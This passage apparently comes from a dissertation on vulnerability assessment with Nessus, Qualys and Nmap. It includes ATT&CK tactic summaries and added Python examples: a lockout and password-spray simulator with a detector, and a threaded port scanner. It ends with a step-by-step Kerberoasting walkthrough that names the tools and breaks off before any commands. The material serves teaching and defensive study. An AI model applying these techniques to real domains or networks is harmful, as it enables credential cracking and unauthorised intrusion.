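            return "locked"
        if DIRECTORY.get(account) == password:
            self.failures[account].clear()
            return "success"
        q = self.failures[account]
        q.append(ts)
        while q and ts - q[0] > self.window:    # forget failures outside the window
            q.popleft()
        if len(q) >= self.threshold:
            self.locked.add(account)
        return "failure"


def run_attempts(policy, attempts):
    """attempts: (ts, source_ip, account, password) tuples in time order.
    Returns the authentication log as (ts, source_ip, account, result)."""
    return [(ts, src, acct, policy.attempt(acct, pw, ts))
            for ts, src, acct, pw in attempts]


def brute_force_attempts(account, wordlist, src="10.0.0.5", start=0):
    """Many passwords against one account, one attempt per second."""
    return [(start + i, src, account, pw) for i, pw in enumerate(wordlist)]


def spray_attempts(accounts, password, src="10.0.0.5", start=0):
    """One password against many accounts, one attempt per second."""
    return [(start + i, src, acct, password) for i, acct in enumerate(accounts)]


def summarize(log):
    """Return ({result: count}, [accounts that authenticated])."""
    counts = defaultdict(int)
    compromised = []
    for _, _, acct, result in log:
        counts[result] += 1
        if result == "success":
            compromised.append(acct)
    return dict(counts), compromised


def detect_spray(log, min_accounts=8, window=OBSERVATION_WINDOW):
    """Flag source IPs whose failures span >= min_accounts distinct accounts
    inside one window: the pattern a per-account lockout counter never sees."""
    by_source = defaultdict(list)
    for ts, src, acct, result in log:
        if result == "failure":
            by_source[src].append((ts, acct))
    flagged = []
    for src, events in by_source.items():
        events.sort()
        recent = deque()
        for ts, acct in events:
            recent.append((ts, acct))
            while ts - recent[0][0] > window:
                recent.popleft()
            if len({a for _, a in recent}) >= min_accounts:
                flagged.append(src)
                break
    return sorted(flagged)
```

With the constructed data, the brute force against user01 produces five failures and then only "locked" results, so the correct password is never tried; the spray produces one failure per account, no lockouts, and two successes, and is caught only by `detect_spray`, which counts distinct accounts per source rather than failures per account.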

1.5.7 Discovery

Discovery consists of techniques that allow the adversary to gain knowledge about the system and internal network. When adversaries gain access to a new system, they must orient themselves to what they now have control of and what benefits operating from that system give to their current objective or overall goals during the intrusion. The operating system provides many native tools that aid in this post-compromise information-gathering phase.
1) Account Discovery
Example commands that can acquire this information are net user, net group, and net localgroup using the Net utility, or through use of dsquery. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly use a system, System Owner/User Discovery may apply.

1.5.8 Lateral Movement

Lateral Movement consists of techniques that enable an adversary to access and control remote systems on a network and could, but does not necessarily, include execution of tools on remote systems. The lateral movement techniques could allow an adversary to gather information from a system without needing additional tools, such as a remote access tool.
1) Pass the Hash
Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.

1.5.9 Collection

Collection consists of techniques used to identify and gather information, such as sensitive files, from a target network prior to exfiltration. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.
1) Data from Local System
Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system, prior to Exfiltration.

Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a Command-Line Interface, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

1.5.10 Exfiltration

Exfiltration refers to techniques and attributes that result in or aid the adversary removing files and information from a target network. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.
1) Automated Exfiltration
Data may be exfiltrated using automated processing or Scripting after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol.

1.5.11 Command and Control

The Command and Control tactic represents how adversaries communicate with systems under their control within a target network. There are many ways an adversary can establish command and control with various levels of covertness, depending on system configuration and network topology. Due to the wide degree of variation available to the adversary at the network level, only the most common factors were used to describe the differences in command and control. There are still a great many specific techniques within the documented methods, largely due to how easy it is to define new protocols and use existing, legitimate protocols and network services for communication.

The resulting breakdown should help convey the idea that detecting intrusion through command and control protocols without prior knowledge is a difficult proposition over the long term. Adversaries' main constraints in network-level defense evasion are testing and deployment of tools to rapidly change their protocols, awareness of existing defensive technologies, and access to legitimate Web services that, when used appropriately, make their tools difficult to distinguish from benign traffic.
1) Commonly Used Port
To bypass network detection and firewalls, and to blend in with normal network activity so as not to be detected, adversaries may communicate over a commonly used port. Commonly open ports include:
TCP:80 (HTTP)
TCP:443 (HTTPS)
TCP:25 (SMTP)
TCP/UDP:53 (DNS)
TCP/UDP:135 (RPC)
TCP/UDP:22 (SSH)
TCP/UDP:3389 (RDP)
Chapter 2

Literature Survey

2.1 Vulnerability assessment and patching management

Insha Altaf, Firdous ul Rashid, Jawad Ahmad Dar, "Vulnerability assessment and patching management", 2015 International Conference on Soft Computing Techniques and Implementations (ICSCTI), Department of ECE, FET, MRIU, Faridabad, India, Oct 8-10, 2015.

Vulnerability assessment is the process of identifying, quantifying, and prioritizing the vulnerabilities in a system. It is conducted to determine the weaknesses inherent in the information systems that could be exploited, leading to an information system breach.

In this paper the authors explain automated testing and manual testing, focusing on improving the accuracy and precision of vulnerability testing [1].

2.2 The Research on a Patch Management System for Enterprise Vulnerability Update

S. M. Furnell, A. Al-Ayed, Duanyang Zhao, "The Research on a Patch Management System for Enterprise Vulnerability Update", 2009 WASE International Conference on Information Engineering, IEEE, DOI 10.1109/ICIE.2009.233.

Because worms and viruses make use of vulnerabilities in computer systems, applications and network devices, computer software and applications are increasingly getting into trouble.

18
Chapter 2. Literature Survey 19

Although there are opportunities to defend against these attacks at an earlier stage, people suffer several serious disruptions because many administrators and users did not realize the importance of patch management.

This paper designs and implements a patch management system for vulnerability precaution and protection which can efficiently repair vulnerabilities of computer systems in time [2].

2.3 Automated and Safe Vulnerability Assessment

Fanglu Guo, Yang Yu, Tzi-cker Chiueh, "Automated and Safe Vulnerability Assessment", Proceedings of the 21st Annual Computer Security Applications Conference (ACSAC 2005), 1063-9527, 2005 IEEE.

Vulnerability assessment (VA) has emerged as a powerful system security administration tool that can identify vulnerabilities in existing systems and applications before they are exploited.

This paper focuses on how to automate the entire process of vulnerability testing and thus for the first time makes it feasible to run vulnerability testing autonomously and frequently [3].

2.4 Integrated Vulnerability Management System for Enterprise Networks

William Wu, Frederick Yip, Eunice Yiu, Pradeep Ray, "Integrated Vulnerability Management System for Enterprise Networks", 2009 International Conference on Soft Computing Techniques and Implementations (ICSCTI), 2009.

The number of vulnerabilities in enterprise networks, systems and applications has greatly increased recently, as seen from frequent vulnerability reports from organizations such as CERT and Microsoft.

Researchers in a number of organizations are currently working to develop and deploy frameworks to comprehensively manage these network vulnerabilities.

This paper examines the existing attempts to solve this problem and the gaps in the existing methodologies [4].

2.5 Vulnerability Assessment and Penetration Testing of Web Application

Sangeeta Nagpure, Sonal Kurkure, "Vulnerability Assessment and Penetration Testing of Web Application", 2017 International Conference on Computing, Communication, Control and Automation (ICCUBEA).

In an organization, the soundness of the architecture is checked by performing vulnerability assessment and penetration testing.

The OWASP Top 10 vulnerabilities (2017 edition) are considered mainly to secure web applications. They are:
1) Injection
2) Broken Authentication
3) Sensitive Data Exposure
4) XML External Entities (XXE)
5) Broken Access Control
6) Security Misconfiguration
7) Cross-Site Scripting (XSS)
8) Insecure Deserialization
9) Using Components with Known Vulnerabilities
10) Insufficient Logging and Monitoring [5]

This paper explains exploitation techniques and vulnerability assessment of web applications based on the OWASP Top 10 vulnerabilities.
Chapter 3

Experimental Design & Setup

3.1 Nessus

Nessus is a vulnerability scanning tool that is run remotely against targets and raises an alert after scanning if it discovers vulnerabilities that malicious hackers could use to gain access to any computer, application or network device you have connected to a network. The Nessus scanner does this by running tens of thousands of plugin checks against a given target, testing the computer, application or network device to see if any of these attacks could be used to break into or otherwise harm it.

Nessus components

•Policy creation
Policies allow you to create custom templates defining what actions are performed during a scan. Once created, they can be selected from the list of scan templates. You can select the type of scan to perform on the devices in the network; the scan settings determine what types of vulnerabilities are detected on the devices. You can also create your own policy based on your requirements. User-defined policies are mainly used for compliance audits and for selecting specific plugin IDs.

•Credentials
Both credentialed (authenticated) and non-credentialed scans can be performed. Five categories of credentials are available:
Cloud services
Database
Host
Miscellaneous
Plaintext authentication

•Compliance
Compliance means conforming to a set rule, such as a policy or specification, and maintaining a standard based on the requirement. Organizations that aspire to this goal take steps to comply with regulations, policies and relevant laws.

Chapter 3. Experimental Design & Setup 22

Figure 3.1: Nessus Architecture
Examples:
CIS Amazon Web Services Foundations Audit
CIS Cisco Firewall
CIS Apache Tomcat
CIS Apple macOS
CIS CentOS
CIS Microsoft Windows 10 Enterprise

•Plugins
Plugins are small programs or scripts that run against a target device looking for vulnerabilities. They are grouped into families, for example:
Backdoors
Databases
Cisco
Firewalls
FTP
DNS

Nessus Scanning Process:

1) Log in to the Nessus account.

2) Create a policy:
Select New Policy.
Select the scan template you want to run on the target device.
Fill in the basic details.

3) Select the Discovery tab and change the settings below as required:
o Host Discovery
o Port scanning
o Service discovery

4) Select the Assessment tab and change the settings below as required:
o General
o Brute force
o Web Applications
o Windows
o Malware

5) Select the required compliance audit for the vulnerability scan.

6) Select the required plugins if you want to check for particular vulnerabilities.

7) Save the policy.

8) Create a new folder in which to perform the scan.
9) Go to the respective folder.
10) Click on New Scan.
11) Select the scan template (policy) based on your requirement.
12) Give the authentication details to perform a credentialed (authenticated) scan; otherwise skip this step.
13) Schedule the scan for the required time.
14) Click on Save and run the scan.

3.2 Qualys

Qualys provides cloud security, compliance and related services and is based in Foster City, California. Qualys was the first company to deliver vulnerability management (VM) solutions as applications through the web using the SaaS (software as a service) model. It also provides other services such as web application scanning, web application firewall, CloudView, Cloud Agent, etc.

Figure 3.2: Vulnerability Management Life Cycle

Vulnerability management module in Qualys

Host Assets
The assets on which we want to perform vulnerability scanning. Here we can add and remove IPs, and hosts can be tracked in three ways:
1) IP tracked hosts
2) DNS tracked hosts
3) NetBIOS tracked hosts

Knowledge base
This is the central repository of all vulnerabilities, both those with real-time threat indicators and those without. Vulnerabilities are categorised into three types:
Confirmed vulnerability:
A vulnerability is classified as confirmed when Qualys has gathered conclusive evidence that the weakness exists and can be exploited (for example, a successful test probe rather than only a version banner).
Potential vulnerability:
A vulnerability is classified as potential when Qualys could gather only indirect evidence (such as a product version) and could not verify that it is exploitable, so this type of vulnerability needs manual verification.
Information gathered:
Qualys payloads gather information about the assets, such as open ports, services running, operating systems, etc.

Search list
Search lists help to create templates of knowledge base entries, so we can perform specific vulnerability scans on the systems. Types of search lists:
1) Static search list: a manually defined list of QIDs.
2) Dynamic search list: defined by search criteria and updated as the knowledge base changes.

Option profile
An option profile is the set of scan settings used for vulnerability scanning. In it you can specify the ports to scan, the QIDs to test, etc.

Scan
Scan helps to create and launch a scan or schedule it. By providing authentication details we can choose between an authenticated and an unauthenticated (non-intrusive) scan.

Report
Reports give the details of vulnerabilities, operating systems and services running on the assets. Here we can create specific templates based on our requirements, such as QIDs, vulnerabilities, severity, etc.

Remediation
Remediation helps to create tickets based on vulnerabilities and track them. After a scan, each vulnerability is assigned one of four statuses:
1) New: the vulnerability was identified for the first time on the device.
2) Active: the same vulnerability was identified again on rescan.
3) Closed: the vulnerability is no longer detected on rescan.
4) Reopened: a vulnerability that had been closed is detected again on a later rescan.
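The four status transitions above, implemented as an added example (this is not Qualys code): `update_statuses` applies the rules to the set of (host, QID) pairs each scan detects, and `needs_ticket` lists the findings a remediation queue should still be tracking. The hosts, QIDs and scan results are constructed.

```python
"""Status transitions for vulnerability findings across rescans.

Added example (not Qualys code): applies the New / Active / Closed /
Reopened rules to the (host, QID) pairs each scan detects. Hosts, QIDs and
scan results below are constructed.
"""

NEW, ACTIVE, CLOSED, REOPENED = "New", "Active", "Closed", "Reopened"


def update_statuses(previous, detected):
    """previous: {(host, qid): status} from the last scan (empty at first).
    detected: set of (host, qid) pairs found by the current scan.
    Returns the status map after this scan."""
    current = {}
    for finding in detected:
        old = previous.get(finding)
        if old is None:
            current[finding] = NEW          # first detection on this host
        elif old == CLOSED:
            current[finding] = REOPENED     # came back after it was closed
        else:
            current[finding] = ACTIVE       # still present since last scan
    for finding in previous:
        if finding not in detected:
            current[finding] = CLOSED       # no longer detected (or stays closed)
    return current


def needs_ticket(statuses):
    """Findings still open: everything not Closed, sorted for stable output."""
    return sorted(f for f, s in statuses.items() if s != CLOSED)


# Constructed rescans of two hosts (QIDs are placeholders, not real Qualys IDs).
SCAN_1 = {("10.0.0.5", 90007), ("10.0.0.5", 38170), ("10.0.0.9", 91233)}
SCAN_2 = {("10.0.0.5", 90007), ("10.0.0.9", 91233)}
SCAN_3 = {("10.0.0.5", 38170), ("10.0.0.9", 91233), ("10.0.0.9", 42001)}


def track(scans):
    """Run the scans in order and return the status map after each one."""
    history, statuses = [], {}
    for detected in scans:
        statuses = update_statuses(statuses, detected)
        history.append(dict(statuses))
    return history


if __name__ == "__main__":
    for n, statuses in enumerate(track([SCAN_1, SCAN_2, SCAN_3]), start=1):
        print(f"after scan {n}: {sorted(statuses.items())}")
```

The Reopened state is the one worth watching in a remediation queue: a finding that was closed and comes back usually means the patch was rolled back, the host was re-imaged from an old template, or the original closure was a scan that could not reach the host rather than a fix.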

Vulnerability scanning phases in Qualys

1) Hosts
In this phase we discover which devices are live so that vulnerability scanning can be performed on them.
2) Port Scanning
Finds all the open UDP and TCP ports on the devices.
3) Service Discovery
Identifies the services running on the open ports.
4) Device Identification
Identifies the operating system, starting from the first open port.
5) Vulnerability assessment
The assessment is based on:
1) Operating system
2) Active services
3) Installed software
6) Module launching
Specific vulnerability modules are loaded based on the information gathered during the previous phases.
7) Signatures
1) Template-based vulnerability signatures.
2) Non-intrusive tests for almost all detections.
3) Specially crafted requests are sent to the host to distinguish patched from unpatched versions.
4) Multiple tests are performed to validate or confirm the vulnerability.

3.3 Nmap

Nmap ("Network Mapper") is a free and open source (licensed) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
Nmap can be used for
1) Host discovery
2) Port discovery / enumeration
3) Service discovery
4) Operating system version detection
5) Hardware (MAC) address detection (only for hosts on the same layer-2 segment as the scanner)
6) Service version detection
7) Vulnerability detection, using Nmap scripts (NSE)

3.4 Python

Python is an interpreted, high-level, general-purpose programming language created by Guido van Rossum and first released in 1991. Python has a design philosophy that emphasizes code readability, notably using significant whitespace (indentation), which helps programmers express concepts in very few lines of code. Python provides constructs that enable clear programming on both small and large scales. Python features a dynamic type system and automatic memory management. It supports multiple programming paradigms, including object-oriented, imperative, functional and procedural, and has a large and comprehensive standard library. Python interpreters are available for many operating systems. CPython, the reference implementation of Python, is open source software and has a community-based development model, as do nearly all of its variant implementations. CPython is managed by the non-profit Python Software Foundation.
Python modules used
1) socket
2) threading
3) os
4) time
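The host and port discovery step that Nmap performs (section 3.3), written with the socket, threading and time modules listed above as an added example; this is not the dissertation's own scanner. It does what Nmap's `-sT` connect scan does, completing a TCP handshake against each port, which needs no raw sockets or administrator rights but leaves a full connection in the logs of every open port. The demo binds a throwaway listener on loopback so it runs without network access; the port range and thread count are assumptions.

```python
"""Threaded TCP connect scan: host/port discovery done by hand.

Added example, not the dissertation's own scanner. The listener and the
scanned port range are constructed so the demo runs offline.
"""
import socket
import threading
import time
from queue import Queue, Empty


def probe(host, port, timeout=0.5):
    """True if a TCP connect() to host:port succeeds within timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def scan_ports(host, ports, workers=32, timeout=0.5):
    """Probe every port in `ports` with a pool of worker threads.
    Returns the open ports in ascending order."""
    todo = Queue()
    for port in ports:
        todo.put(port)
    open_ports = []
    lock = threading.Lock()

    def worker():
        while True:
            try:
                port = todo.get_nowait()
            except Empty:
                return
            if probe(host, port, timeout):
                with lock:
                    open_ports.append(port)

    threads = [threading.Thread(target=worker, daemon=True) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sorted(open_ports)


def start_listener(host="127.0.0.1"):
    """Bind a listening socket on a free port, standing in for a live service."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv


def demo(width=20):
    """Open a local listener, scan the ports around it, and return
    (listener_port, open_ports_found, seconds_taken)."""
    srv = start_listener()
    port = srv.getsockname()[1]
    started = time.time()
    found = scan_ports("127.0.0.1", range(max(1, port - width), port + width))
    elapsed = time.time() - started
    srv.close()
    return port, found, elapsed


if __name__ == "__main__":
    listener, found, secs = demo()
    print(f"listener on {listener}; open ports found: {found}; {secs:.2f}s")
```

Against remote hosts the timeout dominates the run time: a filtered port (firewall silently dropping the SYN) costs the full timeout per probe, whereas a closed port answers with a RST immediately, which is why the thread pool matters far more on filtered networks than on loopback.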

3.5 Maltego

Maltego is an interactive data mining tool that renders directed graphs for link analysis. The tool is used mainly for online investigations to find interconnections between pieces of information from various sources located on the Internet.
The tool uses transforms to automate the process of querying different data sources. This data is then displayed on a node-based graph suited for performing link analysis.
Currently there are three versions of the Maltego client, namely Maltego XL, Maltego Classic and Maltego CE; we primarily concentrate on Maltego CE (community edition).
All three versions of the Maltego client have access to a library of standard transforms for the discovery of data from a wide range of open sources that are commonly used in digital forensics and in online investigations.
Since Maltego can integrate with almost any data source, many data vendors have used the tool as a delivery platform for their information. This also means Maltego can be adapted to your own, particular requirements.
The focus of Maltego is examining the real-world relationships between information that is publicly available on the Internet. This includes information gathering on Internet infrastructure as well as gathering information about the organisation and the individuals who own it.
Maltego can be used to examine the relationships between the following entities:
1) People's details such as names, email addresses, aliases.
2) Groups of individuals (social networks).
3) Companies.
4) Organisations.
5) Web sites.
6) Internet infrastructure, for example domains, DNS names, netblocks, IP addresses, affiliations.
7) Documents and files.
Connections between these pieces of information are discovered using open source intelligence (OSINT) techniques by querying sources such as DNS records, whois records, search engines, social networks, various online APIs and by extracting metadata.
Maltego presents results in a wide range of graphical layouts that allow clustering of information, which makes seeing relationships instant and accurate; this makes it possible to see hidden connections even if they are three or four degrees of separation apart.

3.6 OSINT Framework

OSINT Framework, as its name implies, is a cybersecurity framework, a collection of OSINT tools that makes intelligence and data collection tasks easier.
The tool is mostly used by security researchers and penetration testers for digital footprinting, OSINT research, intelligence gathering, and reconnaissance.
It provides a simple web interface that lets you browse different OSINT tools filtered by category. It also provides an excellent classification of all existing intel sources, making it a great resource for recognising which infosec areas you are neglecting to explore, or what the next suggested OSINT steps for your investigation should be.
OSINT Framework is classified by topic and goal. This is easily seen while exploring the OSINT tree available through the web interface.
When you click any of the categories, such as Username, Email Address, or Domain Name, a set of useful resources appears on the screen as a sub-tree.
Searching for users, email addresses, IP addresses or social network details becomes very easy, as all of the tools are available in one single interface. It is much like a giant OSINT bookmarks library.
For instance, within IP Address, specifically in the Protected by Cloud Services section, you will find links to CloudFlare Watch and CloudFail. Under Domain and DNS History, you will find a few tools in the PassiveDNS section, including the SecurityTrails toolbox, Mnemonic, PTRarchive.com, and DNS Dumpster. With SecurityTrails you are able to explore domain DNS history, along with useful information about IP addresses, historical IP records and WHOIS history, and correlate such information in a single place.
Another interesting category is "Vulnerabilities," found inside the Domain Names category, which offers access to a number of vulnerability-related scanners and archives, such as:
1) Mage Scan
2) Sn1per (T)
3) ASafaWeb
4) Zone-H.org
5) XSSposed.org

Figure 3.3: Open Source Intelligence Framework (OSINT)

Figure 3.4: Sub-domains of the OSINT Framework

3.7 Command and Control Activity

Command and control activity describes how the compromised client systems communicate with the server systems under the attacker's control in the target network. Client systems can establish command and control with varying levels of stealth, depending on the network topology and system configuration.
Because of the wide range of options available to the client systems at the network level, the variations in command and control are described here by their most common factors.
Commonly used techniques for command and control:
1) Commonly used port
To bypass network detection and firewalls, and to look like normal network activity, client systems may communicate on a commonly used port. Commonly open ports include:
TCP:80 (HTTP)
TCP:443 (HTTPS)
TCP:25 (SMTP)
TCP/UDP:53 (DNS)
TCP/UDP:135 (RPC)
TCP:22 (SSH)
TCP/UDP:3389 (RDP)

2) Uncommonly used port

Client systems may conduct command and control communications with a server system over an uncommonly used port in order to slip past firewalls and proxies that are improperly configured.
Chapter 4

Experiments & Results

4.1 Vulnerability Management using Nessus

Nessus is one of the tools used for vulnerability scanning; it can perform both intrusive and non-intrusive scans. The step-by-step process for finding vulnerabilities in devices using Nessus is:
• Asset inventory (gather the devices on which to perform scanning)
• Log in to the Nessus vulnerability scanner
• Create a New Policy
• Select the Policy Template (Advanced Scan, Network Scan, etc.)
• Give the basic details and permissions for the template
• Select the authenticated scan if you want to perform an intrusive scan
• Go to the Compliance tab to perform a specific audit of the system
• Select the required plugins and save the policy
• Create a New Scan
• Select the required policy
• Enter the net-blocks, IPs or hostnames in the Targets tab
• Launch the scan
• Export the data once the scan is over
• Rescan the devices after the remediation process to verify
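The export and rescan steps above are where the scan data becomes actionable. The following Python example, added here and not part of the thesis or of Nessus itself, parses two constructed .nessus (v2) exports, summarises the findings by the four severity levels, builds a remediation queue, and diffs the baseline against the post-remediation rescan to verify what was actually fixed and what appeared in the meantime. The hosts, plugin IDs and export contents are made up for the example; the plugin names follow the findings reported later in this chapter.

```python
import xml.etree.ElementTree as ET
from collections import Counter

# Nessus stores severity as 0-4 in the export; 1-4 are the four levels the scanner reports.
SEVERITY = {"0": "Info", "1": "Low", "2": "Medium", "3": "High", "4": "Critical"}
SEVERITY_ORDER = ["Info", "Low", "Medium", "High", "Critical"]


def parse_nessus(xml_text):
    """Parse a .nessus (v2) export into {(host, pluginID, port/proto): finding}."""
    findings = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            key = (host.get("name"), item.get("pluginID"),
                   f"{item.get('port')}/{item.get('protocol')}")
            findings[key] = {
                "host": host.get("name"),
                "plugin": item.get("pluginName"),
                # unrecognised severity values are treated as Info
                "severity": SEVERITY.get(item.get("severity"), "Info"),
                "cves": [c.text for c in item.findall("cve")],
                "solution": (item.findtext("solution") or "").strip(),
            }
    return findings


def severity_summary(findings):
    """Counts per severity level, the same breakdown the Nessus summary shows."""
    return Counter(f["severity"] for f in findings.values())


def triage(findings, min_severity="High"):
    """Findings at or above min_severity, most severe first, for the remediation queue."""
    threshold = SEVERITY_ORDER.index(min_severity)
    rows = [(f["severity"], f["host"], f["plugin"], f["solution"])
            for f in findings.values()
            if SEVERITY_ORDER.index(f["severity"]) >= threshold]
    return sorted(rows, key=lambda r: (-SEVERITY_ORDER.index(r[0]), r[1], r[2]))


def diff_scans(baseline, rescan):
    """Verify remediation: what closed, what is still open, and what appeared since."""
    before, after = set(baseline), set(rescan)
    return {"remediated": sorted(before - after),
            "still_open": sorted(before & after),
            "new": sorted(after - before)}


# Constructed .nessus excerpts: hosts and plugin IDs are made up for this example.
BASELINE_EXPORT = """<NessusClientData_v2><Report name="baseline">
<ReportHost name="10.0.0.5">
<ReportItem port="445" protocol="tcp" severity="4" pluginID="100001"
 pluginName="Security Update for Microsoft Windows SMB Server (ETERNALBLUE)">
 <cve>CVE-2017-0144</cve><solution>Apply the vendor patch.</solution></ReportItem>
<ReportItem port="0" protocol="tcp" severity="4" pluginID="100002"
 pluginName="Microsoft Windows Server 2003 Unsupported Installation Detection">
 <solution>Upgrade to a supported operating system.</solution></ReportItem>
<ReportItem port="443" protocol="tcp" severity="3" pluginID="100003"
 pluginName="SSL Version 2 and 3 Protocol Detection">
 <solution>Disable SSLv2 and SSLv3.</solution></ReportItem>
</ReportHost></Report></NessusClientData_v2>"""

RESCAN_EXPORT = """<NessusClientData_v2><Report name="rescan">
<ReportHost name="10.0.0.5">
<ReportItem port="0" protocol="tcp" severity="4" pluginID="100002"
 pluginName="Microsoft Windows Server 2003 Unsupported Installation Detection">
 <solution>Upgrade to a supported operating system.</solution></ReportItem>
</ReportHost>
<ReportHost name="10.0.0.7">
<ReportItem port="22" protocol="tcp" severity="2" pluginID="100004"
 pluginName="Dropbear SSH Server Detection"><solution>Update Dropbear.</solution></ReportItem>
</ReportHost></Report></NessusClientData_v2>"""

if __name__ == "__main__":
    base, again = parse_nessus(BASELINE_EXPORT), parse_nessus(RESCAN_EXPORT)
    print(dict(severity_summary(base)))
    for row in triage(base):
        print(row)
    print(diff_scans(base, again))
```

The diff is keyed on host, plugin and port, which is the granularity at which a rescan can prove a fix: a finding that disappears from the rescan key set is remediated, one that persists still needs work, and anything new (a new host, or a plugin that was updated between scans) is queued rather than silently accepted.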

Chapter 4. Experiments & Results 36

4.1.1 Results

1) The list of vulnerability scans performed can be found in the My Scans folder.

Figure 4.1: List of scans performed

2) After the net-block ranges are given, Nessus finds which hosts are live in the network and scans those devices with its plugin checks (payloads) to find vulnerabilities.
Vulnerabilities are categorised by severity into four levels:
1) Critical vulnerabilities
2) High vulnerabilities
3) Medium vulnerabilities
4) Low vulnerabilities

Figure 4.2: Categorization of Vulnerabilities



3) The list of vulnerabilities found on the devices is shown, categorised by criticality.
A few of the vulnerabilities found during the scan were:
1) Microsoft Windows Server 2003 unsupported version.
2) Portable SDK for UPnP Devices.
3) SSL Version 2 and 3 Protocol Detection.
4) Microsoft Windows Server Service Crafted RPC Request Handling.
5) Security Update for Microsoft Windows SMB Server (ETERNALBLUE).
6) Oracle TNS Listener.
7) Dropbear SSH Server.

Figure 4.3: List of Vulnerabilities after Scanning



4) Nessus provides detailed information about each vulnerability. Below is the information for the Windows Server 2003 unsupported-version detection. The risk factor, CVE details and CVSS score can also be checked, and Nessus also provides a solution for the vulnerability.

Figure 4.4: Detail information about Vulnerability



4.2 Vulnerability Management using Qualys

1) The Qualys dashboard shows vulnerabilities by severity and the total number of scans performed, with their status. It also shows the Top 10 vulnerabilities and particular vulnerabilities selected according to our requirements.

Figure 4.5: Qualys Dashboard

2) The Knowledge Base consists of all the vulnerabilities Qualys can detect, both exploitable and non-exploitable. In Qualys every vulnerability has a unique QID together with a rating of how severe the vulnerability is.

Figure 4.6: Knowledge Base of Qualys

3) Search lists are of two types: static lists and dynamic lists. A static list is a fixed set of QIDs chosen for scanning; it does not change when the Knowledge Base is updated. A dynamic list is defined by criteria such as vulnerability title, QIDs, severity, exploitability or operating system, so it automatically picks up new QIDs that match those criteria as the Knowledge Base is updated.

Figure 4.7: Search List in Qualys

4) Host assets consist of details of IP addresses, DNS names and NetBIOS names. They also hold information about the IPs purchased under the subscription.

Figure 4.8: Host Assets in Qualys

5) Asset groups are created from IP addresses, DNS names and NetBIOS names that belong to specific groups or domains. They are created on the basis of business justification, such as how critical or important the hosts are to the organisation. Groups are built by choosing from the available hosts, or ranges can be given on which to perform scanning.
6) Option profiles are the scan settings that define how the vulnerability scan is performed: the ports to scan, the vulnerability detection settings, the authentication type, and so on. The checks (payloads) to run against the target systems are chosen with the Custom option under Vulnerability Detection.

Figure 4.9: Asset Groups in Qualys

Figure 4.10: Option profiles in Qualys



7) A scan is created from an option profile and the asset groups on which it should run. Scans can be scheduled according to convenience or the availability of the hosts.

Figure 4.11: List of Scans Created



4.2.1 Results

Qualys gives detailed information about the vulnerabilities on each device. Two types of scan are performed by Qualys.
1) Discovery Scan
A discovery scan finds the live hosts in the network. Qualys probes each target with ICMP echo requests and TCP connection attempts (telnet-style connects to common ports); if the ICMP probes are blocked by a firewall, the TCP connection attempts still reveal which hosts are up.

2) Vulnerability Scan
A vulnerability scan sends its checks (payloads) to the target systems and looks for evidence that they are exploitable. A vulnerability scan can be either intrusive or non-intrusive, and an authenticated scan requires credentials for the target systems.

Figure 4.12: scan details after scanning



Figure 4.13: Vulnerability with severity and operating system details

Figure 4.14: Vulnerabilities with detailed information



4.3 Cyber Attack

Figure 4.15: Scanning the Active Directory for SPN values

A Kerberoasting attack exploits how service accounts use Kerberos authentication with Service Principal Names (SPNs). In the reconnaissance step (Figure 4.15) we focused on finding service accounts by querying user objects for their SPN values; Kerberoasting lets us crack the passwords of those accounts. Logged into an Active Directory domain as any authenticated user, we can request service tickets (TGS) for service accounts by specifying their SPN value. Active Directory returns a ticket whose encrypted part is protected with a key derived from the service account's password (for the RC4-HMAC encryption type that key is the account's NTLM hash). Those service tickets can then be brute-forced offline until one is successfully decrypted, without any risk of account lockouts, because no further authentication attempts are made against the domain (the ticket requests themselves are still recorded by the domain controller as Kerberos service ticket request events). Once a ticket is cracked, the service account password is recovered in plain text.

Even without fully understanding the inner workings of Kerberos, the attack can be summarised as:

1. Scan Active Directory for user accounts with SPN values set.
2. Request service tickets from AD using those SPN values.
3. Extract the service tickets from memory and save them to a file.
4. Brute-force those tickets offline until a password is cracked.

Given these steps, it is easy to see how quickly an attacker can gain access to a domain and begin cracking every service account within minutes. From there, it is only a waiting game until one or more service accounts are compromised.
Step 1: Obtain a list of SPN values for user accounts

We focus on user accounts because they tend to have shorter, weaker passwords. Computer accounts have long, complex, random passwords that change frequently.
There are many ways to obtain this information, including:
1) PowerShell and LDAP queries, as covered earlier.

2) The Active Directory Module for PowerShell.

3) The GetUserSPNs script provided by the Kerberoast toolkit.

4) The Get-NetUser function of PowerSploit.

Step 2: Request service tickets for the service account SPNs

To do this, only a few lines of PowerShell need to be executed; a service ticket is returned and stored in memory on your system. These tickets are encrypted with a key derived from the password of the service account associated with the SPN. We are almost ready to start cracking them.

